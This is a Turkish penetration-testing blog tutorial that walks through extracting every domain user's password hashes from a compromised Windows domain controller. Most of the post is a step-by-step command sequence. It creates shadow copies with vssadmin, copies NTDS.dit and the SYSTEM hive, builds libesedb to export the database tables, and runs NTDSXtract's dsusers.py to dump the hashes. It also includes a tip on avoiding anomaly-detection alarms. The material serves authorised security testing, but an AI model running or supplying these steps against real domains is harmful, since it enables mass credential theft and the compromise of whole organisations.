Volume Shadow Copy Özelliğini Kullanarak Etki Alanı Hesaplarına Ait Parola Özetlerinin Elde Edilmesi

Etki alanı sızma testleri sırasında, etki alanı denetleyicisi (DC) ele geçirildikten sonra gerçekleştirilecek adımlardan birisi, etki alanındaki tüm kullanıcıların parola özetlerinin elde edilmesidir. Bu yazıda Windows işletim sistemine ait standart komutlar araçlar kullanılarak etki alanındaki hesapların parolalarının özeti elde edilecektir.

Domain Admins (etki alanı yöneticileri) grubu yetkileri elde edildikten sonra, MSF smart_hashdump modülü ile etki alanı hesaplarının parola özetleri elde edilebilir. Ancak DC gibi kritik bir makineye Meterpreter ile bağlanılması sızma testleri sırasında istenmeyebilir. Bu sebeple, sistemin kararlılığına daha az zarar verme ihtimali olan yöntemler kullanılarak etki alanındaki hesapların parola özetleri elde edilebilir. Bu amaçla, DC’ye yetkili kullanıcı hakkı ile erişim elde ettikten sonra, NTDS.dit ve SYSTEM dosyaları elde edilecek ve daha sonra da kullanıcı parolalarının özeti elde edilecektir.

 

1) NTDS.dit ve SYSTEM Dosyalarının Elde Edilmesi

Etki alanı nesnelerine ait bilgiler temel olarak NTDS.dit dosyasında bulunmaktadır diyebiliriz. Bu dosya da SYSTEM dosyasındaki bir anahtarla (SYSKEY) şifrelenmiştir. Bu 2 dosya elde edilirse, etki alanındaki kullanıcıların parola özetleri elde edilebilir. Ancak bu 2 dosyaya erişim işletim sistemi tarafından engellenmiştir. Bu amaçla, Volume Shadow Copy kullanılabilir.

Gölge kopya oluşturmak için, öncelikle, işletim sisteminin kurulu olduğu ve NTDS.dit dosyasının tutulduğu disk’te “Configure Shadow Copies…” seçimi yapılır.

acquiring-domain-users-password-hashes-using-volume-shadow-copy-01

Sonrasında seçilen alan gölge kopya oluşturma özelliği aktifleştirilir.

acquiring-domain-users-password-hashes-using-volume-shadow-copy-02

Uyarı mesajı gelirse, bu mesaj onaylanır.

acquiring-domain-users-password-hashes-using-volume-shadow-copy-03

Böylece ilk gölge kopya oluşturulmuştur:

acquiring-domain-users-password-hashes-using-volume-shadow-copy-04

Shadow kopya oluşturma işlemi “Disable” butonu ile iptal edilebilir veya Setting butonu ile konfigüre edilebilir.

acquiring-domain-users-password-hashes-using-volume-shadow-copy-05

Oluşan Shadow kopya içerisinden NTDS.dit ve SYSTEM dosyalarını elde etmek için öncelikle tüm shadow kopyalar listelenir:

vssadmin.exe list shadows

acquiring-domain-users-password-hashes-using-volume-shadow-copy-06

Bu örnekte tek bir kere gölge kopya oluşturulduğu için, bir adet gölge kopya listenmiştir. Bu dizin “\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1” olarak belirtilmiştir. En sondaki ID değeri her gölge kopya için bir artacaktır.

Bu Shadow kopya içerisindeki NTDS.dit ve SYSTEM dosyaları herhangi bir yere (C:\Users\Administrators\Desktop gibi) kaydedilebilir.

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\Users\Administrators\Desktop
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SYSTEM C:\Users\Administrators\Desktop

acquiring-domain-users-password-hashes-using-volume-shadow-copy-07

Elde edilen bu dosyalar Kali bir makinenin üzerine alınabilir. Ancak etki alanında çok fazla nesnenin olması bu dosyaların boyutunun artmasına sebep olacaktır. Bu durum da ağ üzerinde anormallik tespiti yapan ürünlerin (ADS gibi) alarm üretmesine sebep verebilir.

acquiring-domain-users-password-hashes-using-volume-shadow-copy-08

Not: DC’nin arayüzüne erişmeden, komut satırını kullanılarak da gölge kopya elde edilebilir:

vssadmin create shadow /for=c:

acquiring-domain-users-password-hashes-using-volume-shadow-copy-09

Not: SYSTEM dosyası komut satırından ele geçirmek için gölge kopya oluşturmaya gerek yoktur. Aşağıdaki komutun çalışması yeterlidir:

reg save HKLM\SYSTEM C:\SYSTEM_Dosyasi

acquiring-domain-users-password-hashes-using-volume-shadow-copy-10

Bu dosyalar Kali bilgisayarın root masaüstüne kaydedilir.

 

2) Elde Edilen Dosyalardan Etki Alanındaki Kullanıcıların Parola Özetlerinin Elde Edilmesi

Bu başlıkta, kopyalanan NTDS.dit ve SYSTEM dosyaları kullanılarak, etki alanındaki kullanıcı parolaları elde edilecektir. Bu amaçla önce NTDS.dit veritabanından ilgili tablolar çekilecek, daha sonra da bu tablolardan istenen hesap bilgileri çekilecektir. Bu işlem için Google Code üzerindeki “libesedb” aracı kullanılabilir.

acquiring-domain-users-password-hashes-using-volume-shadow-copy-11

Harici linke erişildiğinde araç görülmektedir:

acquiring-domain-users-password-hashes-using-volume-shadow-copy-12

Araç Kali üzerine indirilir.

wget https://255adcba056b7d59fd55a94f0ea02de0cf110bfb.googledrive.com/host/0B3fBvzttpiiSN082cmxsbHB0anc/libesedb-alpha-20120102.tar.gz –no-check-certificate

acquiring-domain-users-password-hashes-using-volume-shadow-copy-13

Sıkıştırılmış dosya çıkarılır.

gunzip libesedb-alpha-20120102.tar.gz
tar -xvf libesedb-alpha-20120102.tar

acquiring-domain-users-password-hashes-using-volume-shadow-copy-14

Konfigürasyon işlemi gerçekleştirilir.

ls
cd libesedb-20120102/
ls
ls -la configure
chmod +x configure
ls -la configure
./configure && make

acquiring-domain-users-password-hashes-using-volume-shadow-copy-15

Sonrasında da esedbtools/ klasörüne girilerek /root/Desktop dizinine koyulan ntds.dit dosyasındaki tablolar dışarıya aktarılır.

cd esedbtools/
ls
./esedbexport /root/Desktop/ntds.dit

acquiring-domain-users-password-hashes-using-volume-shadow-copy-16

Dışa aktarım sonrası durum aşağıdaki gibidir:

ls
cd ntds.dit.export/
ls

acquiring-domain-users-password-hashes-using-volume-shadow-copy-17

Daha sonra dışa aktarılan tabloları kullanarak etki alanındaki kullanıcıların parolalarını elde etmek için NTDSXTRACT aracının ana sayfasına girilir.

acquiring-domain-users-password-hashes-using-volume-shadow-copy-18

Aracın 1.0 sürümü indirilir

cd /root/
wget http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
ls
unzip ntdsxtract_v1_0.zip

acquiring-domain-users-password-hashes-using-volume-shadow-copy-19
Amaç, etki alanı kullanıcılarının parola özetini almak olduğu için dsusers.py betiği kullanılacaktır. Bu betik parametre olarak NTDS.dit içerisinden çıkartılmış olan veri tablosunu ve link tablosunu almakta, ayrıca SYSTEM hive dosyasını da kullanmaktadır.

ls
cd NTDSXtract 1.0/
ls
python ./dsusers.py /root/libesedb-20120102/esedbtools/ntds.dit.export/datatable.3 /root/libesedb-20120102/esedbtools/ntds.dit.export/link_table.5 –passwordhashes /root/Desktop/SYSTEM

acquiring-domain-users-password-hashes-using-volume-shadow-copy-20

Böylece etki alanındaki kullanıcıların parola özetleri bu şekilde elde edilmiştir.

acquiring-domain-users-password-hashes-using-volume-shadow-copy-21

Kaynak:

http://blog.walkerville.org/?p=486

 

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.